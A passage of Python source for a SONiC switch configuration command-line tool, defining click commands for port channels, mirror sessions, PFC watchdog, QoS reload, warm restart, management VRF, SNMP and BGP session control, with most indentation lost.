def add_portchannel(ctx, portchannel_name, min_links, fallback):
"""Add port channel"""
db = ctx.obj['db']
fvs = {'admin_status': 'up',
'mtu': '9100'}
if min_links != 0:
fvs['min_links'] = str(min_links)
if fallback != 'false':
fvs['fallback'] = 'true'
db.set_entry('PORTCHANNEL', portchannel_name, fvs)
@portchannel.command('del')
@click.argument('portchannel_name', metavar='<portchannel_name>', required=True)
@click.pass_context
def remove_portchannel(ctx, portchannel_name):
"""Remove port channel"""
db = ctx.obj['db']
if len([(k, v) for k, v in db.get_table('PORTCHANNEL_MEMBER') if k == portchannel_name]) != 0:
click.echo("Error: Portchannel {} contains members. Remove members before deleting Portchannel!".format(portchannel_name))
else:
db.set_entry('PORTCHANNEL', portchannel_name, None)
@portchannel.group(cls=clicommon.AbbreviationGroup, name='member')
@click.pass_context
def portchannel_member(ctx):
pass
@portchannel_member.command('add')
@click.argument('portchannel_name', metavar='<portchannel_name>', required=True)
@click.argument('port_name', metavar='<port_name>', required=True)
@click.pass_context
def add_portchannel_member(ctx, portchannel_name, port_name):
"""Add member to port channel"""
db = ctx.obj['db']
if clicommon.is_port_mirror_dst_port(db, port_name):
ctx.fail("{} is configured as mirror destination port".format(port_name))
# Check if the member interface given by user is valid in the namespace.
if port_name.startswith("Ethernet") is False or interface_name_is_valid(db, port_name) is False:
ctx.fail("Interface name is invalid. Please enter a valid interface name!!")
    # Don't proceed if the port channel name is not valid
if is_portchannel_name_valid(portchannel_name) is False:
ctx.fail("{} is invalid!, name should have prefix '{}' and suffix '{}'"
.format(portchannel_name, CFG_PORTCHANNEL_PREFIX, CFG_PORTCHANNEL_NO))
    # Don't proceed if the port channel does not exist
if is_portchannel_present_in_db(db, portchannel_name) is False:
ctx.fail("{} is not present.".format(portchannel_name))
    # Don't allow a port to be a member of a port channel if it is configured with an IP address
for key in db.get_table('INTERFACE').keys():
if type(key) != tuple:
continue
if key[0] == port_name:
ctx.fail(" {} has ip address {} configured".format(port_name, key[1]))
return
    # Don't allow a port to be a member of a port channel if it is configured as a VLAN member
for k,v in db.get_table('VLAN_MEMBER'):
if v == port_name:
ctx.fail("%s Interface configured as VLAN_MEMBER under vlan : %s" %(port_name,str(k)))
return
    # Don't allow a port to be a member of a port channel if it is already a member of a port channel
for k,v in db.get_table('PORTCHANNEL_MEMBER'):
if v == port_name:
ctx.fail("{} Interface is already member of {} ".format(v,k))
    # Don't allow a port to be a member of a port channel if its speed does not match the existing members
for k,v in db.get_table('PORTCHANNEL_MEMBER'):
if k == portchannel_name:
member_port_entry = db.get_entry('PORT', v)
port_entry = db.get_entry('PORT', port_name)
if member_port_entry is not None and port_entry is not None:
member_port_speed = member_port_entry.get(PORT_SPEED)
port_speed = port_entry.get(PORT_SPEED)
if member_port_speed != port_speed:
ctx.fail("Port speed of {} is different than the other members of the portchannel {}"
.format(port_name, portchannel_name))
    # Don't allow a port to be a member of a port channel if its MTU does not match the port channel's MTU
portchannel_entry = db.get_entry('PORTCHANNEL', portchannel_name)
if portchannel_entry and portchannel_entry.get(PORT_MTU) is not None :
port_entry = db.get_entry('PORT', port_name)
if port_entry and port_entry.get(PORT_MTU) is not None:
port_mtu = port_entry.get(PORT_MTU)
portchannel_mtu = portchannel_entry.get(PORT_MTU)
if portchannel_mtu != port_mtu:
ctx.fail("Port MTU of {} is different than the {} MTU size"
.format(port_name, portchannel_name))
db.set_entry('PORTCHANNEL_MEMBER', (portchannel_name, port_name),
{'NULL': 'NULL'})
@portchannel_member.command('del')
@click.argument('portchannel_name', metavar='<portchannel_name>', required=True)
@click.argument('port_name', metavar='<port_name>', required=True)
@click.pass_context
def del_portchannel_member(ctx, portchannel_name, port_name):
"""Remove member from portchannel"""
    # Don't proceed if the port channel name is not valid
if is_portchannel_name_valid(portchannel_name) is False:
ctx.fail("{} is invalid!, name should have prefix '{}' and suffix '{}'"
.format(portchannel_name, CFG_PORTCHANNEL_PREFIX, CFG_PORTCHANNEL_NO))
db = ctx.obj['db']
# Check if the member interface given by user is valid in the namespace.
if interface_name_is_valid(db, port_name) is False:
ctx.fail("Interface name is invalid. Please enter a valid interface name!!")
    # Don't proceed if the port channel does not exist
if is_portchannel_present_in_db(db, portchannel_name) is False:
ctx.fail("{} is not present.".format(portchannel_name))
    # Don't proceed if the port is not an existing member of the port channel
if not is_port_member_of_this_portchannel(db, port_name, portchannel_name):
ctx.fail("{} is not a member of portchannel {}".format(port_name, portchannel_name))
db.set_entry('PORTCHANNEL_MEMBER', (portchannel_name, port_name), None)
db.set_entry('PORTCHANNEL_MEMBER', portchannel_name + '|' + port_name, None)
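# Illustrative CONFIG_DB layout assumed by the portchannel commands above (table and key
# shapes are taken from the set_entry()/get_table() calls; the names are examples only):
#   PORTCHANNEL|PortChannel0001                   -> {"admin_status": "up", "mtu": "9100", "min_links": "2"}
#   PORTCHANNEL_MEMBER|PortChannel0001|Ethernet0  -> {"NULL": "NULL"}
# Adding a member creates the PORTCHANNEL_MEMBER row; deleting a member sets the row to
# None, which removes it from CONFIG_DB.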
#
# 'mirror_session' group ('config mirror_session ...')
#
@config.group(cls=clicommon.AbbreviationGroup, name='mirror_session')
def mirror_session():
pass
#
# 'add' subgroup ('config mirror_session add ...')
#
@mirror_session.command('add')
@click.argument('session_name', metavar='<session_name>', required=True)
@click.argument('src_ip', metavar='<src_ip>', required=True)
@click.argument('dst_ip', metavar='<dst_ip>', required=True)
@click.argument('dscp', metavar='<dscp>', required=True)
@click.argument('ttl', metavar='<ttl>', required=True)
@click.argument('gre_type', metavar='[gre_type]', required=False)
@click.argument('queue', metavar='[queue]', required=False)
@click.option('--policer')
def add(session_name, src_ip, dst_ip, dscp, ttl, gre_type, queue, policer):
""" Add ERSPAN mirror session.(Legacy support) """
add_erspan(session_name, src_ip, dst_ip, dscp, ttl, gre_type, queue, policer)
@mirror_session.group(cls=clicommon.AbbreviationGroup, name='erspan')
@click.pass_context
def erspan(ctx):
""" ERSPAN mirror_session """
pass
#
# 'add' subcommand
#
@erspan.command('add')
@click.argument('session_name', metavar='<session_name>', required=True)
@click.argument('src_ip', metavar='<src_ip>', required=True)
@click.argument('dst_ip', metavar='<dst_ip>', required=True)
@click.argument('dscp', metavar='<dscp>', required=True)
@click.argument('ttl', metavar='<ttl>', required=True)
@click.argument('gre_type', metavar='[gre_type]', required=False)
@click.argument('queue', metavar='[queue]', required=False)
@click.argument('src_port', metavar='[src_port]', required=False)
@click.argument('direction', metavar='[direction]', required=False)
@click.option('--policer')
def add(session_name, src_ip, dst_ip, dscp, ttl, gre_type, queue, policer, src_port, direction):
""" Add ERSPAN mirror session """
add_erspan(session_name, src_ip, dst_ip, dscp, ttl, gre_type, queue, policer, src_port, direction)
def gather_session_info(session_info, policer, queue, src_port, direction):
if policer:
session_info['policer'] = policer
if queue:
session_info['queue'] = queue
if src_port:
if clicommon.get_interface_naming_mode() == "alias":
src_port_list = []
for port in src_port.split(","):
src_port_list.append(interface_alias_to_name(None, port))
src_port=",".join(src_port_list)
session_info['src_port'] = src_port
if not direction:
direction = "both"
session_info['direction'] = direction.upper()
return session_info
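# Illustrative input/output for gather_session_info() above (values are examples only):
#   gather_session_info({"type": "SPAN", "dst_port": "Ethernet4"},
#                       policer=None, queue="0", src_port="Ethernet0,Ethernet8", direction=None)
#   -> {"type": "SPAN", "dst_port": "Ethernet4",
#       "queue": "0", "src_port": "Ethernet0,Ethernet8", "direction": "BOTH"}
# A missing direction defaults to "both" and is stored upper-cased; in "alias" naming
# mode each source port is first translated back to its SONiC interface name.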
def add_erspan(session_name, src_ip, dst_ip, dscp, ttl, gre_type, queue, policer, src_port=None, direction=None):
session_info = {
"type" : "ERSPAN",
"src_ip": src_ip,
"dst_ip": dst_ip,
"dscp": dscp,
"ttl": ttl
}
if gre_type:
session_info['gre_type'] = gre_type
session_info = gather_session_info(session_info, policer, queue, src_port, direction)
"""
For multi-npu platforms we need to program all front asic namespaces
"""
namespaces = multi_asic.get_all_namespaces()
if not namespaces['front_ns']:
config_db = ConfigDBConnector()
config_db.connect()
if validate_mirror_session_config(config_db, session_name, None, src_port, direction) is False:
return
config_db.set_entry("MIRROR_SESSION", session_name, session_info)
else:
per_npu_configdb = {}
for front_asic_namespaces in namespaces['front_ns']:
per_npu_configdb[front_asic_namespaces] = ConfigDBConnector(use_unix_socket_path=True, namespace=front_asic_namespaces)
per_npu_configdb[front_asic_namespaces].connect()
if validate_mirror_session_config(per_npu_configdb[front_asic_namespaces], session_name, None, src_port, direction) is False:
return
per_npu_configdb[front_asic_namespaces].set_entry("MIRROR_SESSION", session_name, session_info)
@mirror_session.group(cls=clicommon.AbbreviationGroup, name='span')
@click.pass_context
def span(ctx):
""" SPAN mirror session """
pass
@span.command('add')
@click.argument('session_name', metavar='<session_name>', required=True)
@click.argument('dst_port', metavar='<dst_port>', required=True)
@click.argument('src_port', metavar='[src_port]', required=False)
@click.argument('direction', metavar='[direction]', required=False)
@click.argument('queue', metavar='[queue]', required=False)
@click.option('--policer')
def add(session_name, dst_port, src_port, direction, queue, policer):
""" Add SPAN mirror session """
add_span(session_name, dst_port, src_port, direction, queue, policer)
def add_span(session_name, dst_port, src_port, direction, queue, policer):
if clicommon.get_interface_naming_mode() == "alias":
dst_port = interface_alias_to_name(None, dst_port)
if dst_port is None:
click.echo("Error: Destination Interface {} is invalid".format(dst_port))
return
session_info = {
"type" : "SPAN",
"dst_port": dst_port,
}
session_info = gather_session_info(session_info, policer, queue, src_port, direction)
"""
For multi-npu platforms we need to program all front asic namespaces
"""
namespaces = multi_asic.get_all_namespaces()
if not namespaces['front_ns']:
config_db = ConfigDBConnector()
config_db.connect()
if validate_mirror_session_config(config_db, session_name, dst_port, src_port, direction) is False:
return
config_db.set_entry("MIRROR_SESSION", session_name, session_info)
else:
per_npu_configdb = {}
for front_asic_namespaces in namespaces['front_ns']:
per_npu_configdb[front_asic_namespaces] = ConfigDBConnector(use_unix_socket_path=True, namespace=front_asic_namespaces)
per_npu_configdb[front_asic_namespaces].connect()
if validate_mirror_session_config(per_npu_configdb[front_asic_namespaces], session_name, dst_port, src_port, direction) is False:
return
per_npu_configdb[front_asic_namespaces].set_entry("MIRROR_SESSION", session_name, session_info)
@mirror_session.command()
@click.argument('session_name', metavar='<session_name>', required=True)
def remove(session_name):
""" Delete mirror session """
"""
For multi-npu platforms we need to program all front asic namespaces
"""
namespaces = multi_asic.get_all_namespaces()
if not namespaces['front_ns']:
config_db = ConfigDBConnector()
config_db.connect()
config_db.set_entry("MIRROR_SESSION", session_name, None)
else:
per_npu_configdb = {}
for front_asic_namespaces in namespaces['front_ns']:
per_npu_configdb[front_asic_namespaces] = ConfigDBConnector(use_unix_socket_path=True, namespace=front_asic_namespaces)
per_npu_configdb[front_asic_namespaces].connect()
per_npu_configdb[front_asic_namespaces].set_entry("MIRROR_SESSION", session_name, None)
#
# 'pfcwd' group ('config pfcwd ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
def pfcwd():
"""Configure pfc watchdog """
pass
@pfcwd.command()
@click.option('--action', '-a', type=click.Choice(['drop', 'forward', 'alert']))
@click.option('--restoration-time', '-r', type=click.IntRange(100, 60000))
@click.option('--verbose', is_flag=True, help="Enable verbose output")
@click.argument('ports', nargs=-1)
@click.argument('detection-time', type=click.IntRange(100, 5000))
def start(action, restoration_time, ports, detection_time, verbose):
"""
    Start PFC watchdog on port(s). To configure all ports, use all as input.
Example:
config pfcwd start --action drop ports all detection-time 400 --restoration-time 400
"""
cmd = "pfcwd start"
if action:
cmd += " --action {}".format(action)
if ports:
ports = set(ports) - set(['ports', 'detection-time'])
cmd += " {}".format(' '.join(ports))
if detection_time:
cmd += " {}".format(detection_time)
if restoration_time:
cmd += " --restoration-time {}".format(restoration_time)
clicommon.run_command(cmd, display_cmd=verbose)
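# Illustrative expansion of the docstring example above (a sketch of how the positional
# arguments are forwarded, assuming a single 'all' port):
#   config pfcwd start --action drop ports all detection-time 400 --restoration-time 400
# builds and runs approximately:
#   pfcwd start --action drop all 400 --restoration-time 400
# i.e. the literal words "ports" and "detection-time" are stripped from the positional
# arguments before they are passed on to the pfcwd utility.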
@pfcwd.command()
@click.option('--verbose', is_flag=True, help="Enable verbose output")
def stop(verbose):
""" Stop PFC watchdog """
cmd = "pfcwd stop"
clicommon.run_command(cmd, display_cmd=verbose)
@pfcwd.command()
@click.option('--verbose', is_flag=True, help="Enable verbose output")
@click.argument('poll_interval', type=click.IntRange(100, 3000))
def interval(poll_interval, verbose):
""" Set PFC watchdog counter polling interval (ms) """
cmd = "pfcwd interval {}".format(poll_interval)
clicommon.run_command(cmd, display_cmd=verbose)
@pfcwd.command('counter_poll')
@click.option('--verbose', is_flag=True, help="Enable verbose output")
@click.argument('counter_poll', type=click.Choice(['enable', 'disable']))
def counter_poll(counter_poll, verbose):
""" Enable/disable counter polling """
cmd = "pfcwd counter_poll {}".format(counter_poll)
clicommon.run_command(cmd, display_cmd=verbose)
@pfcwd.command('big_red_switch')
@click.option('--verbose', is_flag=True, help="Enable verbose output")
@click.argument('big_red_switch', type=click.Choice(['enable', 'disable']))
def big_red_switch(big_red_switch, verbose):
""" Enable/disable BIG_RED_SWITCH mode """
cmd = "pfcwd big_red_switch {}".format(big_red_switch)
clicommon.run_command(cmd, display_cmd=verbose)
@pfcwd.command('start_default')
@click.option('--verbose', is_flag=True, help="Enable verbose output")
def start_default(verbose):
""" Start PFC WD by default configurations """
cmd = "pfcwd start_default"
clicommon.run_command(cmd, display_cmd=verbose)
#
# 'qos' group ('config qos ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def qos(ctx):
"""QoS-related configuration tasks"""
pass
@qos.command('clear')
def clear():
"""Clear QoS configuration"""
log.log_info("'qos clear' executing...")
_clear_qos()
def _update_buffer_calculation_model(config_db, model):
"""Update the buffer calculation model into CONFIG_DB"""
buffer_model_changed = False
device_metadata = config_db.get_entry('DEVICE_METADATA', 'localhost')
if device_metadata.get('buffer_model') != model:
buffer_model_changed = True
device_metadata['buffer_model'] = model
config_db.set_entry('DEVICE_METADATA', 'localhost', device_metadata)
return buffer_model_changed
@qos.command('reload')
@click.pass_context
@click.option('--no-dynamic-buffer', is_flag=True, help="Disable dynamic buffer calculation")
@click.option(
'--json-data', type=click.STRING,
help="json string with additional data, valid with --dry-run option"
)
@click.option(
'--dry_run', type=click.STRING,
help="Dry run, writes config to the given file"
)
def reload(ctx, no_dynamic_buffer, dry_run, json_data):
"""Reload QoS configuration"""
log.log_info("'qos reload' executing...")
_clear_qos()
_, hwsku_path = device_info.get_paths_to_platform_and_hwsku_dirs()
sonic_version_file = device_info.get_sonic_version_file()
from_db = "-d --write-to-db"
if dry_run:
from_db = "--additional-data \'{}\'".format(json_data) if json_data else ""
namespace_list = [DEFAULT_NAMESPACE]
if multi_asic.get_num_asics() > 1:
namespace_list = multi_asic.get_namespaces_from_linux()
buffer_model_updated = False
vendors_supporting_dynamic_buffer = ["mellanox"]
for ns in namespace_list:
if ns is DEFAULT_NAMESPACE:
asic_id_suffix = ""
config_db = ConfigDBConnector()
else:
asic_id = multi_asic.get_asic_id_from_name(ns)
if asic_id is None:
click.secho(
"Command 'qos reload' failed with invalid namespace '{}'".
format(ns),
fg="yellow"
)
raise click.Abort()
asic_id_suffix = str(asic_id)
config_db = ConfigDBConnector(
use_unix_socket_path=True, namespace=ns
)
config_db.connect()
if not no_dynamic_buffer and asic_type in vendors_supporting_dynamic_buffer:
buffer_template_file = os.path.join(hwsku_path, asic_id_suffix, "buffers_dynamic.json.j2")
buffer_model_updated |= _update_buffer_calculation_model(config_db, "dynamic")
else:
buffer_template_file = os.path.join(hwsku_path, asic_id_suffix, "buffers.json.j2")
if asic_type in vendors_supporting_dynamic_buffer:
buffer_model_updated |= _update_buffer_calculation_model(config_db, "traditional")
if os.path.isfile(buffer_template_file):
qos_template_file = os.path.join(
hwsku_path, asic_id_suffix, "qos.json.j2"
)
if os.path.isfile(qos_template_file):
cmd_ns = "" if ns is DEFAULT_NAMESPACE else "-n {}".format(ns)
fname = "{}{}".format(dry_run, asic_id_suffix) if dry_run else "config-db"
command = "{} {} {} -t {},{} -t {},{} -y {}".format(
SONIC_CFGGEN_PATH, cmd_ns, from_db, buffer_template_file,
fname, qos_template_file, fname, sonic_version_file
)
# Apply the configurations only when both buffer and qos
# configuration files are present
clicommon.run_command(command, display_cmd=True)
else:
click.secho("QoS definition template not found at {}".format(
qos_template_file
), fg="yellow")
else:
click.secho("Buffer definition template not found at {}".format(
buffer_template_file
), fg="yellow")
if buffer_model_updated:
print("Buffer calculation model updated, restarting swss is required to take effect")
def is_dynamic_buffer_enabled(config_db):
"""Return whether the current system supports dynamic buffer calculation"""
device_metadata = config_db.get_entry('DEVICE_METADATA', 'localhost')
return 'dynamic' == device_metadata.get('buffer_model')
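# Illustrative DEVICE_METADATA content consulted by is_dynamic_buffer_enabled()
# (field name taken from the code above; values are examples):
#   DEVICE_METADATA|localhost -> {"buffer_model": "dynamic"}      => returns True
#   DEVICE_METADATA|localhost -> {"buffer_model": "traditional"}  => returns False
#   'buffer_model' field missing                                  => returns False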
#
# 'warm_restart' group ('config warm_restart ...')
#
@config.group(cls=clicommon.AbbreviationGroup, name='warm_restart')
@click.pass_context
@click.option('-s', '--redis-unix-socket-path', help='unix socket path for redis connection')
def warm_restart(ctx, redis_unix_socket_path):
"""warm_restart-related configuration tasks"""
kwargs = {}
if redis_unix_socket_path:
kwargs['unix_socket_path'] = redis_unix_socket_path
config_db = ConfigDBConnector(**kwargs)
config_db.connect(wait_for_init=False)
# warm restart enable/disable config is put in stateDB, not persistent across cold reboot, not saved to config_DB.json file
state_db = SonicV2Connector(host='127.0.0.1')
state_db.connect(state_db.STATE_DB, False)
TABLE_NAME_SEPARATOR = '|'
prefix = 'WARM_RESTART_ENABLE_TABLE' + TABLE_NAME_SEPARATOR
ctx.obj = {'db': config_db, 'state_db': state_db, 'prefix': prefix}
@warm_restart.command('enable')
@click.argument('module', metavar='<module>', default='system', required=False, type=click.Choice(["system", "swss", "bgp", "teamd"]))
@click.pass_context
def warm_restart_enable(ctx, module):
state_db = ctx.obj['state_db']
prefix = ctx.obj['prefix']
_hash = '{}{}'.format(prefix, module)
state_db.set(state_db.STATE_DB, _hash, 'enable', 'true')
state_db.close(state_db.STATE_DB)
@warm_restart.command('disable')
@click.argument('module', metavar='<module>', default='system', required=False, type=click.Choice(["system", "swss", "bgp", "teamd"]))
@click.pass_context
def warm_restart_disable(ctx, module):
state_db = ctx.obj['state_db']
prefix = ctx.obj['prefix']
_hash = '{}{}'.format(prefix, module)
state_db.set(state_db.STATE_DB, _hash, 'enable', 'false')
state_db.close(state_db.STATE_DB)
@warm_restart.command('neighsyncd_timer')
@click.argument('seconds', metavar='<seconds>', required=True, type=int)
@click.pass_context
def warm_restart_neighsyncd_timer(ctx, seconds):
db = ctx.obj['db']
    if seconds not in range(1, 10000):
ctx.fail("neighsyncd warm restart timer must be in range 1-9999")
db.mod_entry('WARM_RESTART', 'swss', {'neighsyncd_timer': seconds})
@warm_restart.command('bgp_timer')
@click.argument('seconds', metavar='<seconds>', required=True, type=int)
@click.pass_context
def warm_restart_bgp_timer(ctx, seconds):
db = ctx.obj['db']
    if seconds not in range(1, 3601):
ctx.fail("bgp warm restart timer must be in range 1-3600")
db.mod_entry('WARM_RESTART', 'bgp', {'bgp_timer': seconds})
@warm_restart.command('teamsyncd_timer')
@click.argument('seconds', metavar='<seconds>', required=True, type=int)
@click.pass_context
def warm_restart_teamsyncd_timer(ctx, seconds):
db = ctx.obj['db']
    if seconds not in range(1, 3601):
ctx.fail("teamsyncd warm restart timer must be in range 1-3600")
db.mod_entry('WARM_RESTART', 'teamd', {'teamsyncd_timer': seconds})
@warm_restart.command('bgp_eoiu')
@click.argument('enable', metavar='<enable>', default='true', required=False, type=click.Choice(["true", "false"]))
@click.pass_context
def warm_restart_bgp_eoiu(ctx, enable):
db = ctx.obj['db']
db.mod_entry('WARM_RESTART', 'bgp', {'bgp_eoiu': enable})
def mvrf_restart_services():
"""Restart interfaces-config service and NTP service when mvrf is changed"""
"""
When mvrf is enabled, eth0 should be moved to mvrf; when it is disabled,
move it back to default vrf. Restarting the "interfaces-config" service
will recreate the /etc/network/interfaces file and restart the
"networking" service that takes care of the eth0 movement.
NTP service should also be restarted to rerun the NTP service with or
without "cgexec" accordingly.
"""
cmd="service ntp stop"
os.system (cmd)
cmd="systemctl restart interfaces-config"
os.system (cmd)
cmd="service ntp start"
os.system (cmd)
def vrf_add_management_vrf(config_db):
"""Enable management vrf in config DB"""
entry = config_db.get_entry('MGMT_VRF_CONFIG', "vrf_global")
if entry and entry['mgmtVrfEnabled'] == 'true' :
click.echo("ManagementVRF is already Enabled.")
return None
config_db.mod_entry('MGMT_VRF_CONFIG', "vrf_global", {"mgmtVrfEnabled": "true"})
mvrf_restart_services()
"""
The regular expression for grep in below cmd is to match eth0 line in /proc/net/route, sample file:
$ cat /proc/net/route
Iface Destination Gateway Flags RefCnt Use Metric Mask MTU Window IRTT
eth0 00000000 01803B0A 0003 0 0 202 00000000 0 0 0
"""
cmd = "cat /proc/net/route | grep -E \"eth0\s+00000000\s+[0-9A-Z]+\s+[0-9]+\s+[0-9]+\s+[0-9]+\s+202\" | wc -l"
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
output = proc.communicate()
if int(output[0]) >= 1:
cmd="ip -4 route del default dev eth0 metric 202"
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
proc.communicate()
if proc.returncode != 0:
click.echo("Could not delete eth0 route")
def vrf_delete_management_vrf(config_db):
"""Disable management vrf in config DB"""
entry = config_db.get_entry('MGMT_VRF_CONFIG', "vrf_global")
if not entry or entry['mgmtVrfEnabled'] == 'false' :
click.echo("ManagementVRF is already Disabled.")
return None
config_db.mod_entry('MGMT_VRF_CONFIG', "vrf_global", {"mgmtVrfEnabled": "false"})
mvrf_restart_services()
@config.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def snmpagentaddress(ctx):
"""SNMP agent listening IP address, port, vrf configuration"""
config_db = ConfigDBConnector()
config_db.connect()
ctx.obj = {'db': config_db}
ip_family = {4: AF_INET, 6: AF_INET6}
@snmpagentaddress.command('add')
@click.argument('agentip', metavar='<SNMP AGENT LISTENING IP Address>', required=True)
@click.option('-p', '--port', help="SNMP AGENT LISTENING PORT")
@click.option('-v', '--vrf', help="VRF Name mgmt/DataVrfName/None")
@click.pass_context
def add_snmp_agent_address(ctx, agentip, port, vrf):
"""Add the SNMP agent listening IP:Port%Vrf configuration"""
#Construct SNMP_AGENT_ADDRESS_CONFIG table key in the format ip|<port>|<vrf>
if not clicommon.is_ipaddress(agentip):
click.echo("Invalid IP address")
return False
config_db = ctx.obj['db']
if not vrf:
entry = config_db.get_entry('MGMT_VRF_CONFIG', "vrf_global")
if entry and entry['mgmtVrfEnabled'] == 'true' :
click.echo("ManagementVRF is Enabled. Provide vrf.")
return False
found = 0
ip = ipaddress.ip_address(agentip)
for intf in netifaces.interfaces():
ipaddresses = netifaces.ifaddresses(intf)
if ip_family[ip.version] in ipaddresses:
for ipaddr in ipaddresses[ip_family[ip.version]]:
if agentip == ipaddr['addr']:
found = 1
break;
if found == 1:
break;
else:
        click.echo("IP address is not available")
return
key = agentip+'|'
if port:
key = key+port
#snmpd does not start if we have two entries with same ip and port.
key1 = "SNMP_AGENT_ADDRESS_CONFIG|" + key + '*'
entry = config_db.get_keys(key1)
if entry:
ip_port = agentip + ":" + port
click.echo("entry with {} already exists ".format(ip_port))
return
key = key+'|'
if vrf:
key = key+vrf
config_db.set_entry('SNMP_AGENT_ADDRESS_CONFIG', key, {})
#Restarting the SNMP service will regenerate snmpd.conf and rerun snmpd
cmd="systemctl restart snmp"
os.system (cmd)
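# Illustrative SNMP_AGENT_ADDRESS_CONFIG keys produced by the command above
# (key format is "<ip>|<port>|<vrf>", with omitted fields left empty; values are examples):
#   config snmpagentaddress add 10.1.1.1                 -> key "10.1.1.1||"
#   config snmpagentaddress add 10.1.1.1 -p 161 -v mgmt  -> key "10.1.1.1|161|mgmt"
# snmpd is then restarted so that snmpd.conf is regenerated with the new listen address.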
@snmpagentaddress.command('del')
@click.argument('agentip', metavar='<SNMP AGENT LISTENING IP Address>', required=True)
@click.option('-p', '--port', help="SNMP AGENT LISTENING PORT")
@click.option('-v', '--vrf', help="VRF Name mgmt/DataVrfName/None")
@click.pass_context
def del_snmp_agent_address(ctx, agentip, port, vrf):
"""Delete the SNMP agent listening IP:Port%Vrf configuration"""
key = agentip+'|'
if port:
key = key+port
key = key+'|'
if vrf:
key = key+vrf
config_db = ctx.obj['db']
config_db.set_entry('SNMP_AGENT_ADDRESS_CONFIG', key, None)
cmd="systemctl restart snmp"
os.system (cmd)
@config.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def snmptrap(ctx):
"""SNMP Trap server configuration to send traps"""
config_db = ConfigDBConnector()
config_db.connect()
ctx.obj = {'db': config_db}
@snmptrap.command('modify')
@click.argument('ver', metavar='<SNMP Version>', type=click.Choice(['1', '2', '3']), required=True)
@click.argument('serverip', metavar='<SNMP TRAP SERVER IP Address>', required=True)
@click.option('-p', '--port', help="SNMP Trap Server port, default 162", default="162")
@click.option('-v', '--vrf', help="VRF Name mgmt/DataVrfName/None", default="None")
@click.option('-c', '--comm', help="Community", default="public")
@click.pass_context
def modify_snmptrap_server(ctx, ver, serverip, port, vrf, comm):
"""Modify the SNMP Trap server configuration"""
#SNMP_TRAP_CONFIG for each SNMP version
config_db = ctx.obj['db']
if ver == "1":
#By default, v1TrapDest value in snmp.yml is "NotConfigured". Modify it.
config_db.mod_entry('SNMP_TRAP_CONFIG', "v1TrapDest", {"DestIp": serverip, "DestPort": port, "vrf": vrf, "Community": comm})
elif ver == "2":
config_db.mod_entry('SNMP_TRAP_CONFIG', "v2TrapDest", {"DestIp": serverip, "DestPort": port, "vrf": vrf, "Community": comm})
else:
config_db.mod_entry('SNMP_TRAP_CONFIG', "v3TrapDest", {"DestIp": serverip, "DestPort": port, "vrf": vrf, "Community": comm})
cmd="systemctl restart snmp"
os.system (cmd)
@snmptrap.command('del')
@click.argument('ver', metavar='<SNMP Version>', type=click.Choice(['1', '2', '3']), required=True)
@click.pass_context
def delete_snmptrap_server(ctx, ver):
"""Delete the SNMP Trap server configuration"""
config_db = ctx.obj['db']
if ver == "1":
config_db.mod_entry('SNMP_TRAP_CONFIG', "v1TrapDest", None)
elif ver == "2":
config_db.mod_entry('SNMP_TRAP_CONFIG', "v2TrapDest", None)
else:
config_db.mod_entry('SNMP_TRAP_CONFIG', "v3TrapDest", None)
cmd="systemctl restart snmp"
os.system (cmd)
#
# 'bgp' group ('config bgp ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
def bgp():
"""BGP-related configuration tasks"""
pass
#
# 'shutdown' subgroup ('config bgp shutdown ...')
#
@bgp.group(cls=clicommon.AbbreviationGroup)
def shutdown():
"""Shut down BGP session(s)"""
pass
# 'all' subcommand
@shutdown.command()
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def all(verbose):
"""Shut down all BGP sessions
       In the case of a multi-ASIC platform, only the eBGP sessions with external neighbors are shut down.
"""
log.log_info("'bgp shutdown all' executing...")
namespaces = [DEFAULT_NAMESPACE]
if multi_asic.is_multi_asic():
ns_list = multi_asic.get_all_namespaces()
namespaces = ns_list['front_ns']
# Connect to CONFIG_DB in linux host (in case of single ASIC) or CONFIG_DB in all the
    # namespaces (in case of multi ASIC) and do the specified "action" on the BGP neighbor(s)
for namespace in namespaces:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
bgp_neighbor_ip_list = _get_all_neighbor_ipaddresses(config_db)
for ipaddress in bgp_neighbor_ip_list:
_change_bgp_session_status_by_addr(config_db, ipaddress, 'down', verbose)
# 'neighbor' subcommand
@shutdown.command()
@click.argument('ipaddr_or_hostname', metavar='<ipaddr_or_hostname>', required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def neighbor(ipaddr_or_hostname, verbose):
"""Shut down BGP session by neighbor IP address or hostname.
User can specify either internal or external BGP neighbor to shutdown
"""
log.log_info("'bgp shutdown neighbor {}' executing...".format(ipaddr_or_hostname))
namespaces = [DEFAULT_NAMESPACE]
found_neighbor = False
if multi_asic.is_multi_asic():
ns_list = multi_asic.get_all_namespaces()
namespaces = ns_list['front_ns'] + ns_list['back_ns']
# Connect to CONFIG_DB in linux host (in case of single ASIC) or CONFIG_DB in all the
    # namespaces (in case of multi ASIC) and do the specified "action" on the BGP neighbor(s)
for namespace in namespaces:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
if _change_bgp_session_status(config_db, ipaddr_or_hostname, 'down', verbose):
found_neighbor = True
if not found_neighbor:
click.get_current_context().fail("Could not locate neighbor '{}'".format(ipaddr_or_hostname))
@bgp.group(cls=clicommon.AbbreviationGroup)
def startup():
"""Start up BGP session(s)"""
pass
# 'all' subcommand
@startup.command()
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def all(verbose):
"""Start up all BGP sessions
       In the case of a multi-ASIC platform, only the eBGP sessions with external neighbors are started up.
"""
log.log_info("'bgp startup all' executing...")
namespaces = [DEFAULT_NAMESPACE]
if multi_asic.is_multi_asic():
ns_list = multi_asic.get_all_namespaces()
namespaces = ns_list['front_ns']
# Connect to CONFIG_DB in linux host (in case of single ASIC) or CONFIG_DB in all the
    # namespaces (in case of multi ASIC) and do the specified "action" on the BGP neighbor(s)
for namespace in namespaces:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
bgp_neighbor_ip_list = _get_all_neighbor_ipaddresses(config_db)
